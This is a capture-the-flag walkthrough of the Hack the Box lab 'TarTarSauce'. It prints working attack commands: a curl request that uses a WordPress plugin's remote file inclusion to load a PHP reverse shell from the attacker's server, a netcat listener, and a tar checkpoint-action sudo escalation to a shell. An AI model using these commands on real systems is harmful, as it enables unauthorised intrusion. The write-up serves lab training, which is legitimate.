Today we are going to solve another CTF challenge “TarTarSauce”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.
Task: To find user.txt and root.txt file
Note: Since these labs are online available therefore they have a static IP. The IP of TarTarSauce is 10.10.10.88
Let’s start off with our basic nmap command to find out the open ports and services.
C:\Users\jacco>nmap -sC -sV -T4 10.10.10.88 Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-08 15:13 W. Europe Summer Time Nmap scan report for 10.10.10.88 Host is up (0.034s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-robots.txt: 5 disallowed entries | /webservices/tar/tar/source/ | /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/ |_/webservices/developmental/ /webservices/phpmyadmin/ |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Landing Page Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 19.00 seconds
Let’s navigate to port 80 through a web browser. By exploring IP in the URL box, it puts up following web page as shown in the below image.
We don’t find anything on the webpage, so we run dirb to enumerate the directories. We find a directory called “/webservices/”. We further enumerate “/webservices/” as we don’t find anything in that directory.
Dirb scan gave us the directory called “/webservices/wp/” that hosts a WordPress site.
We run wpscan to enumerate the themes and plugins and find a vulnerable plugin called “Gwolle Guestbook”. We search for the exploit and find that it is vulnerable to Remote File Inclusion (RFI).
Advisory ID: HTB23275 Product: Gwolle Guestbook WordPress Plugin Vendor: Marcel Pol Vulnerable Version(s): 1.5.3 and probably prior Tested Version: 1.5.3 Advisory Publication: October 14, 2015 [without technical details] Vendor Notification: October 14, 2015 Vendor Patch: October 16, 2015 Public Disclosure: November 4, 2015 Vulnerability Type: PHP File Inclusion [CWE-98] CVE Reference: CVE-2015-8351 Risk Level: Critical CVSSv3 Base Score: 9.0 [CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H] Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered a critical Remote File Inclusion (RFI) in Gwolle Guestbook WordPress plugin, which can be exploited by non-authenticated attacker to include remote PHP file and execute arbitrary code on the vulnerable system. HTTP GET parameter "abspath" is not being properly sanitized before being used in PHP require() function. A remote attacker can include a file named 'wp-load.php' from arbitrary remote server and execute its content on the vulnerable web server. In order to do so the attacker needs to place a malicious 'wp-load.php' file into his server document root and includes server's URL into request: http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://[hackers_website]
We follow the instructions according to the given POC on exploit-db and use the php-reverse-shell.php available on Kali Linux. We copy it to desktop and rename it to wp-load.php to execute our php shell using RFI. We start our python HTTP server to exploit RFI on the target machine.
c:\Python37>python -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.88 - - [08/Apr/2019 15:04:19] "GET /wp-load.php HTTP/1.0" 200 -
C:\Users\jacco>curl -s http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.20/
We set up our listener using netcat; as soon as we execute our php shell through RFI, we are successfully able to get a reverse shell. We go to “/home” directory and find a folder called “onuma”. We are unable to access the “onuma” directory. So we spawn a tty shell using python to check the sudoers list.We check the sudoers list and find that we can run tar as user “onuma” without any password. Hence we can exploit wild card injection for privilege escalation.
C:\Users\jacco>nc -lvp 443 listening on [any] 443 ... 10.10.10.88: inverse host lookup failed: h_errno 11004: NO_DATA connect to [10.10.14.20] from (UNKNOWN) [10.10.10.88] 58762: NO_DATA Linux TartarSauce 4.15.0-041500-generic #201802011154 SMP Thu Feb 1 12:05:23 UTC 2018 i686 i686 i686 GNU/Linux 09:04:20 up 15:48, 0 users, load average: 0.00, 0.04, 0.01 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ python -c "import pty; pty.spawn('/bin/bash')" www-data@TartarSauce:/$ sudo -l sudo -l Matching Defaults entries for www-data on TartarSauce: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on TartarSauce: (onuma) NOPASSWD: /bin/tar www-data@TartarSauce:/$
We’ll take advantage of the
tar options for checkpoints. The
--checkpoint=x flag tells tar to take some action every x bytes, as a progress update. The default behavior is to print a status message. However, the
--checkpoint-action parameter allows the user to specify what action to take at a check point. So I can have it just give me a shell:
C:\Users\jacco>nc -lvp 443 listening on [any] 443 ... 10.10.10.88: inverse host lookup failed: h_errno 11004: NO_DATA connect to [10.10.14.20] from (UNKNOWN) [10.10.10.88] 58770: NO_DATA Linux TartarSauce 4.15.0-041500-generic #201802011154 SMP Thu Feb 1 12:05:23 UTC 2018 i686 i686 i686 GNU/Linux 10:06:50 up 16:51, 0 users, load average: 0.01, 0.01, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ python3 -c "import pty; pty.spawn('/bin/bash')" www-data@TartarSauce:/$ sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash <ll /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash onuma@TartarSauce:/$ id id uid=1000(onuma) gid=1000(onuma) groups=1000(onuma),24(cdrom),30(dip),46(plugdev) onuma@TartarSauce:/$ ls ls bin dev home lib media opt root sbin srv tmp var boot etc initrd.img lost+found mnt proc run snap sys usr vmlinuz onuma@TartarSauce:/$ cat /home/onuma/user.txt cat /home/onuma/user.txt b2d*****2c7
i use pspy for processes detection. here, letting
pspy32 run for a bit shows a script that runs as root every 5 minutes:
2018/05/29 07:56:33 CMD: UID=0 PID=24065 | /bin/bash /usr/sbin/backuperer
Enumerating through the system we find a file a called a backuperer that has been symlinked to a file a named “backup” in “/usr/local/bin directory”.
We take a look at the content of the file and find that it is a file that creates a gzip archive of files inside “/var/www/html/”. It also checks the integrity of the file after 30 seconds from the creation of the file.
We use a script that takes advantage of the “sleep” function of the script. As it waits for 30 seconds and then checks the integrity of the file we have 30 seconds to recreate the archive. We use this script here. After running the script we find the root flag.
Author: Sayantan Bera